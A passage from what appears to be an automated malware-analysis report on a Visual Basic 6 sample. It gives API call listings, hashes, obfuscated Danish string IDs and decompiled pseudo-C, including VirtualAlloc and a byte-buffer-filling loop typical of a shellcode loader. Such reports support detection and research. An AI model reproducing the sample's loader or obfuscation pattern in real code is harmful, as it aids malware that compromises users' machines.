                  • __vbaFreeStr.MSVBVM60(?,?,00514F93,?), ref: 0040C424
                  • __vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,?,00514F93,?), ref: 0040C437
                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,004012A6), ref: 0040C445
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,?,?,?,?,004012A6), ref: 0040C45D
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C496
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,000000F0), ref: 0040C4E0
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040C507
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C540
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B07C,00000048), ref: 0040C584
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040C5AB
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C5E4
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,00000128), ref: 0040C631
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040C658
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C691
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,000001DC), ref: 0040C6DB
                  • __vbaChkstk.MSVBVM60(00000008), ref: 0040C794
                  • __vbaChkstk.MSVBVM60(?,?,000017DD,Underbevidsthed,003554E3,00000008), ref: 0040C7CC
                  • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,000017DD,Underbevidsthed,003554E3,00000008), ref: 0040C804
                  • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040C823
                  • __vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040C849
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040C861
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C89A
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,00000048), ref: 0040C8DE
                  • __vbaChkstk.MSVBVM60(667A4DB0,00005B07,?), ref: 0040C957
                  • __vbaChkstk.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040C981
                  • __vbaChkstk.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040C995
                  • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD54,00000700,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040C9D6
                  • __vbaFreeObj.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040C9F6
                  • __vbaFreeVar.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CA01
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CA19
                  • __vbaObjSet.MSVBVM60(?,00000000,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CA52
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,000000A0,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CA9F
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CAC6
                  • __vbaObjSet.MSVBVM60(?,00000000,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CAFF
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B05C,000001A0,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CB4C
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CB73
                  • __vbaObjSet.MSVBVM60(?,00000000,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CBAC
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000128,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CBF9
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CC20
                  • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CC59
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,000000F0,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CCA3
                  • __vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000,?,?,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CCC5
                  • __vbaI4Var.MSVBVM60(?), ref: 0040CCD4
                  • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD54,00000704), ref: 0040CD66
                  • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040CD90
                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?), ref: 0040CD9E
                  • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD24,000002B4), ref: 0040CDD5
                  • __vbaVarForInit.MSVBVM60(?,?,?,00000002,00000002,00000002), ref: 0040CE49
                  • __vbaVarDup.MSVBVM60(?,?,?,00000002,00000002,00000002), ref: 0040CE79
                  • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD54,00000708), ref: 0040CEED
                  • __vbaFreeVar.MSVBVM60(00000000,004011C8,0040AD54,00000708), ref: 0040CF07
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040CF1F
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CF58
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B06C,00000068), ref: 0040CF9F
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040CFC6
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CFFF
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B07C,00000090), ref: 0040D04C
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D073
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D0AC
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,000000F8), ref: 0040D0F6
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D11D
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D156
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,000001DC), ref: 0040D1A0
                  • __vbaStrMove.MSVBVM60(00000000,?,0040B05C,000001DC), ref: 0040D21E
                  • __vbaChkstk.MSVBVM60(00000003), ref: 0040D259
                  • __vbaChkstk.MSVBVM60(?,?,418E7D50,?,?,?,00000008,00000003), ref: 0040D29D
                  • __vbaFreeStr.MSVBVM60(?,?,?,00000008,00000003), ref: 0040D2BF
                  • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,00000008,00000003), ref: 0040D2D6
                  • __vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0040D2EE
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D309
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D342
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,00000048), ref: 0040D386
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D3AD
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D3E6
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,000000E8), ref: 0040D433
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D45A
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D493
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B07C,00000058), ref: 0040D4D7
                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040D4F9
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D514
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D54D
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000060), ref: 0040D594
                  • __vbaI4Var.MSVBVM60(?), ref: 0040D5BB
                  • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD54,0000070C,?,?,?,?,?), ref: 0040D680
                  • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?,?,?,?,?,?), ref: 0040D6B3
                  • __vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0040D6CB
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D6E6
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D71F
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,00000170), ref: 0040D769
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D790
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D7C9
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000110), ref: 0040D816
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D83D
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D876
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000070), ref: 0040D8BD
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040D8E4
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D91D
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000128), ref: 0040D96A
                  • __vbaChkstk.MSVBVM60(?,?,?), ref: 0040D9E7
                  • __vbaChkstk.MSVBVM60(00005D72,?,?,?,?), ref: 0040DA0A
                  • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,?), ref: 0040DA3B
                  • __vbaFreeVar.MSVBVM60 ref: 0040DA49
                  • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD54,00000710), ref: 0040DA85
                  • __vbaVarMove.MSVBVM60(00000000,004011C8,0040AD54,00000710), ref: 0040DAA2
                  • __vbaVarForNext.MSVBVM60(?,?,?), ref: 0040DAB9
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,0040DB73), ref: 0040DB52
                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0040DB5D
                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0040DB65
                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0040DB6D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$CheckHresult$New2$Free$ChkstkList$Move$CallLate$#543InitNext
                  • String ID: 21:21:21$Pt$RRETS$Underbevidsthed$overstiges$z_$BZ$T5
                  • API String ID: 2874494357-181388081
                  • Opcode ID: f0421826c4cc453be7f089f7ee2a9335aab88a91ca71e4829f0ef4cc594867cf
                  • Instruction ID: f556c72d5a6782e2dfb78e47f0c4431e01cb86a0bd26e32385fbcee2f19090dd
                  • Opcode Fuzzy Hash: f0421826c4cc453be7f089f7ee2a9335aab88a91ca71e4829f0ef4cc594867cf
                  • Instruction Fuzzy Hash: 07F2E27190022CDFDB21DF90CC49BDDBBB4AB08304F1045EAE549BB2A1CBB95AC59F59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 46%
                  			E0040EAC8(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a52) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				void* _v36;
                  				void* _v52;
                  				void* _v56;
                  				char _v60;
                  				char _v64;
                  				char _v80;
                  				intOrPtr* _v84;
                  				signed int _v88;
                  				intOrPtr* _v96;
                  				signed int _v100;
                  				char* _t39;
                  				signed int _t43;
                  				char* _t44;
                  				char* _t46;
                  				intOrPtr _t66;
                  
                  				_push(0x4012a6);
                  				_push( *[fs:0x0]);
                  				 *[fs:0x0] = _t66;
                  				_push(0x50);
                  				L004012A0();
                  				_v12 = _t66;
                  				_v8 = 0x401250;
                  				L004013E4();
                  				L004013E4();
                  				if( *0x410010 != 0) {
                  					_v96 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v96 = 0x410010;
                  				}
                  				_t39 =  &_v60;
                  				L004013CC();
                  				_v84 = _t39;
                  				_t43 =  *((intOrPtr*)( *_v84 + 0x120))(_v84,  &_v64, _t39,  *((intOrPtr*)( *((intOrPtr*)( *_v96)) + 0x310))( *_v96));
                  				asm("fclex");
                  				_v88 = _t43;
                  				if(_v88 >= 0) {
                  					_v100 = _v100 & 0x00000000;
                  				} else {
                  					_push(0x120);
                  					_push(0x40b06c);
                  					_push(_v84);
                  					_push(_v88);
                  					L004013D8();
                  					_v100 = _t43;
                  				}
                  				_push(0);
                  				_push(0);
                  				_push(_v64);
                  				_t44 =  &_v80;
                  				_push(_t44); // executed
                  				L004013BA(); // executed
                  				_push(_t44);
                  				L0040142C();
                  				L0040145C();
                  				_push(_t44);
                  				_push(L"Koinciderede4");
                  				_push(L"Sequences");
                  				_push(L"TANKRENSNING"); // executed
                  				L0040134E(); // executed
                  				L00401462();
                  				_push( &_v64);
                  				_t46 =  &_v60;
                  				_push(_t46);
                  				_push(2);
                  				L004013C6();
                  				L00401450();
                  				_push(E0040EC23);
                  				L00401450();
                  				L00401450();
                  				return _t46;
                  			}


                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040EAE3
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040EAFB
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040EB06
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,?,?,004012A6), ref: 0040EB1E
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EB4B
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000120), ref: 0040EB80
                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040EB99
                  • __vbaStrVarMove.MSVBVM60(00000000), ref: 0040EBA2
                  • __vbaStrMove.MSVBVM60(00000000), ref: 0040EBAC
                  • #690.MSVBVM60(TANKRENSNING,Sequences,Koinciderede4,00000000,00000000), ref: 0040EBC1
                  • __vbaFreeStr.MSVBVM60(TANKRENSNING,Sequences,Koinciderede4,00000000,00000000), ref: 0040EBC9
                  • __vbaFreeObjList.MSVBVM60(00000002,?,?,TANKRENSNING,Sequences,Koinciderede4,00000000,00000000), ref: 0040EBD8
                  • __vbaFreeVar.MSVBVM60(Koinciderede4,00000000,00000000), ref: 0040EBE3
                  • __vbaFreeVar.MSVBVM60(0040EC23,Koinciderede4,00000000,00000000), ref: 0040EC15
                  • __vbaFreeVar.MSVBVM60(0040EC23,Koinciderede4,00000000,00000000), ref: 0040EC1D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Free$Move$#690CallCheckChkstkHresultLateListNew2
                  • String ID: #@$Koinciderede4$Pt$Sequences$TANKRENSNING
                  • API String ID: 1502117440-711310471
                  • Opcode ID: d91bb43516a79fdcc507c8fb27501a93ff8bdf53125687ec41201fcb527df2da
                  • Instruction ID: a0b683229fda30ca98858b9c9b412ab390ded157babe93e24d9ed812827dbb20
                  • Opcode Fuzzy Hash: d91bb43516a79fdcc507c8fb27501a93ff8bdf53125687ec41201fcb527df2da
                  • Instruction Fuzzy Hash: B331E971900208ABDB04EBD1DC46FDDBBB8FF08708F50453AF502BA1E2DBB969558B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: #100
                  • String ID: VB5!6&*
                  • API String ID: 1341478452-3593831657
                  • Opcode ID: 459b37422cbfca2d052bd3719bbde016be65f4a00d9d1159754ac0d9a3da5345
                  • Instruction ID: 395847132b0c30adca150897e652c8d26356471fa49975a112cf7dc192435249
                  • Opcode Fuzzy Hash: 459b37422cbfca2d052bd3719bbde016be65f4a00d9d1159754ac0d9a3da5345
                  • Instruction Fuzzy Hash: 72D0AE1155E7D20FD70316751D215856F705A5365831B08EBA4C1EA4E3C05C484AC377
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 00403393
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: e0f64a72f42f6e4d3f77dbb2774518b281ccdb5adb6cb381d7257e0e875ad839
                  • Instruction ID: eaa86b7c1b4a9e34241aa81295ff1d3b5e9636d60d8a3e5cd2c5c937a5fe33d4
                  • Opcode Fuzzy Hash: e0f64a72f42f6e4d3f77dbb2774518b281ccdb5adb6cb381d7257e0e875ad839
                  • Instruction Fuzzy Hash: CD312591A1DA04D9D6573921C5912B05E48FAA3393374EF7B84A37A1F1353E0F8724CA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 00403393
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 659580b46ce1ecb54381b449aca7643406b02b5d0c0c6d4c50f8e15e91a0146d
                  • Instruction ID: 8196bf07988cbb31726b2ef9135d1aa3b73a63253cabc9e3a70d381c49224e9e
                  • Opcode Fuzzy Hash: 659580b46ce1ecb54381b449aca7643406b02b5d0c0c6d4c50f8e15e91a0146d
                  • Instruction Fuzzy Hash: 74213891A2DB04D9D6573E21C5912B05E48FAA3393374EF6B84A37A1F1353E0E8324CA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 00403393
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 94e4827dea38c6544adcd4436288d94716ac0dee5ced40ea1584c227eb6727f0
                  • Instruction ID: 575f291398b55b8eb4d00c2eabd101a17c1628979e12b5ae335188185cc6dd01
                  • Opcode Fuzzy Hash: 94e4827dea38c6544adcd4436288d94716ac0dee5ced40ea1584c227eb6727f0
                  • Instruction Fuzzy Hash: D7210691A1DB04D9D6573D20C5812B06E48FAA3393374AFAB84A77A1F1353E0E8325CA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 00403393
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 6d0da37a347f86074a2bba3ed384ecf50f98f9dfa72460174b39342e58678664
                  • Instruction ID: 45a56ee92838250897ca94ad2870e8313a3e834647a2d40765de4ad7e5f3882c
                  • Opcode Fuzzy Hash: 6d0da37a347f86074a2bba3ed384ecf50f98f9dfa72460174b39342e58678664
                  • Instruction Fuzzy Hash: 7E21089192D704C9D6573E31C5912B06E48FAA3387374AFBB84A77A1F1353E0E8325CA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                  • Instruction ID: d394a65342a6a254380257ba0734a19f866dc21ad068f5b1ddaac111a7468d93
                  • Opcode Fuzzy Hash: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                  • Instruction Fuzzy Hash: F641279025E2D4EFC71B47B64CBA2813FE1AE07108B1A88EFD6D54B8A3E555241FC727
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                  • Instruction ID: 0ef76ab4ed2bcdf07a831812e9108315abc5032b0251afc9fc56c28be75d868b
                  • Opcode Fuzzy Hash: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                  • Instruction Fuzzy Hash: 5E11DAB150E3E59FCB174B748CB52527FB0AF1B20070A44EBD4819F8A7E268281ED727
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                  • Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
                  • Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                  • Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E0040DB92(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a20) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				void* _v40;
                  				void* _v44;
                  				intOrPtr _v56;
                  				char _v68;
                  				char _v76;
                  				signed int _v80;
                  				signed int _v92;
                  				signed int _v96;
                  				signed int _v100;
                  				signed int _v104;
                  				signed int _v108;
                  				signed int _v112;
                  				signed int _v116;
                  				signed int _v120;
                  				signed int _v124;
                  				signed int _v128;
                  				signed int _v132;
                  				signed int _v136;
                  				signed int _v140;
                  				signed int _v144;
                  				signed int _v148;
                  				signed int _v152;
                  				signed int _v156;
                  				signed int _v160;
                  				signed int _v164;
                  				signed int _v168;
                  				signed int _v172;
                  				signed int _v176;
                  				signed int _v180;
                  				signed int _v184;
                  				signed int _v188;
                  				signed int _v192;
                  				signed int _v196;
                  				signed int _v200;
                  				signed int _v204;
                  				char _t226;
                  				char* _t228;
                  				void* _t325;
                  				void* _t327;
                  				intOrPtr _t328;
                  
                  				_t328 = _t327 - 0xc;
                  				 *[fs:0x0] = _t328;
                  				L004012A0();
                  				_v16 = _t328;
                  				_v12 = 0x4011d8;
                  				_v8 = 0;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t325);
                  				L00401420();
                  				L004013E4();
                  				_push(0x11);
                  				_push(0x40b0e0);
                  				_t226 =  &_v68;
                  				_push(_t226);
                  				L004013A2();
                  				_v80 = _v80 & 0x00000000;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v92 = _t226;
                  				} else {
                  					_v92 = _v92 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 1;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v96 = _t226;
                  				} else {
                  					_v96 = _v96 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 2;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v100 = _t226;
                  				} else {
                  					_v100 = _v100 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 3;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v104 = _t226;
                  				} else {
                  					_v104 = _v104 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 4;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v108 = _t226;
                  				} else {
                  					_v108 = _v108 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 5;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v112 = _t226;
                  				} else {
                  					_v112 = _v112 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 6;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v116 = _t226;
                  				} else {
                  					_v116 = _v116 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 7;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v120 = _t226;
                  				} else {
                  					_v120 = _v120 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 8;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v124 = _t226;
                  				} else {
                  					_v124 = _v124 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 9;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v128 = _t226;
                  				} else {
                  					_v128 = _v128 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0xa;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v132 = _t226;
                  				} else {
                  					_v132 = _v132 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0xb;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v136 = _t226;
                  				} else {
                  					_v136 = _v136 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0xc;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v140 = _t226;
                  				} else {
                  					_v140 = _v140 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0xd;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v144 = _t226;
                  				} else {
                  					_v144 = _v144 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0xe;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v148 = _t226;
                  				} else {
                  					_v148 = _v148 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0xf;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v152 = _t226;
